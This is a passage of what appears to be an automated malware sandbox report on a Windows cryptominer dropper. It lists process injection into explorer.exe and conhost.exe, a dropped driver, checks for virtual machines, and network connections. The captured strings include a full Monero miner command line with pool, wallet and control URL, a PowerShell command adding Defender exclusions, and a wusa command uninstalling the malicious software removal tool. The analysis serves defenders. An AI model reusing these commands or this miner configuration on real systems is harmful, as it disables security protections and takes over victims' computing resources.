              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172951287.0000000000C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEEN-UST
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEG
              Source: explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTPS://PACHYDERMAL-DEVIATI.000WEBHOSTAPP.COM/API/ENDPOINT.PHPRDURXNLMTIXFCPXR
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="84SCVGT4B7V61SOOVBV9UXDKTV7POMJFZGGDIUMEY4LWKFQJI5CVOJM82OU9FIATPLFB9TWIZSEQRVZVAKDUBCFKSAHSUJF" --PASS="" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="ZADEJSSJSCKF.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://PACHYDERMAL-DEVIATI.000WEBHOSTAPP.COM/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.0" --NICEHASH --TLS --CINIT-IDLE-WAIT=2 --CINIT-IDLE-CPU=60 --CINIT-ID="RDURXNLMTIXFCPXR"
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE<
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=84SCVGT4B7V61SOOVBV9UXDKTV7POMJFZGGDIUMEY4LWKFQJI5CVOJM82OU9FIATPLFB9TWIZSEQRVZVAKDUBCFKSAHSUJF--PASS=--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=ZADEJSSJSCKF.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://PACHYDERMAL-DEVIATI.000WEBHOSTAPP.COM/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--NICEHASH--TLS--CINIT-IDLE-WAIT=2--CINIT-IDLE-CPU=60--CINIT-ID=RDURXNLMTIXFCPXRR
              Source: explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172951287.0000000000C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172951287.0000000000C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMM9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6469Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3121Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7240
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2261
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeDropped PE file which has not been started: C:\Windows\Temp\zadejssjsckf.sysJump to dropped file
              Source: C:\Users\user\Desktop\gq83mrprwy.exeAPI coverage: 3.2 %
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeAPI coverage: 3.2 %
              Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
              Source: C:\Users\user\Desktop\gq83mrprwy.exe TID: 7384Thread sleep time: -37000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 6469 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 3121 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7912Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764Thread sleep count: 7240 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8768Thread sleep count: 2261 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\explorer.exe TID: 8204Thread sleep count: 101 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: conhost.exe, 00000028.00000002.4195797094.00000254E0240000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f0u_Za,fG@fLLOK\EI^V=|tX@6\_rO 3R4J``>oG3h'3nH xsFPN@JrU@l&H]QemUG*sJ`vEK!&_xQvjX4$[yX-c@[``i}(zgJ,BjPLPo{AuSZyr9vt%^qh>\A
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
              Source: svchost.exe, 00000005.00000002.4196648139.000001F4E382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4198073932.000001F4E8E5A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\gq83mrprwy.exeCode function: 0_2_00007FF7970C1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,0_2_00007FF7970C1160
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeCode function: 28_2_00007FF74F581160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,28_2_00007FF74F581160
              Source: C:\Windows\System32\conhost.exeCode function: 40_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,40_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeNetwork Connect: 51.15.65.182 10343Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 145.14.144.16 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 145.14.144.253 443Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeMemory written: PID: 4488 base: 140000000 value: 4DJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeMemory written: PID: 4488 base: 140001000 value: NUJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeMemory written: PID: 4488 base: 140674000 value: DFJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeMemory written: PID: 4488 base: 140847000 value: 00Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeMemory written: PID: 4488 base: 806010 value: 00Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeThread register set: target process: 9160Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeThread register set: target process: 4488Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeMemory written: C:\Windows\System32\conhost.exe base: 14000B000Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
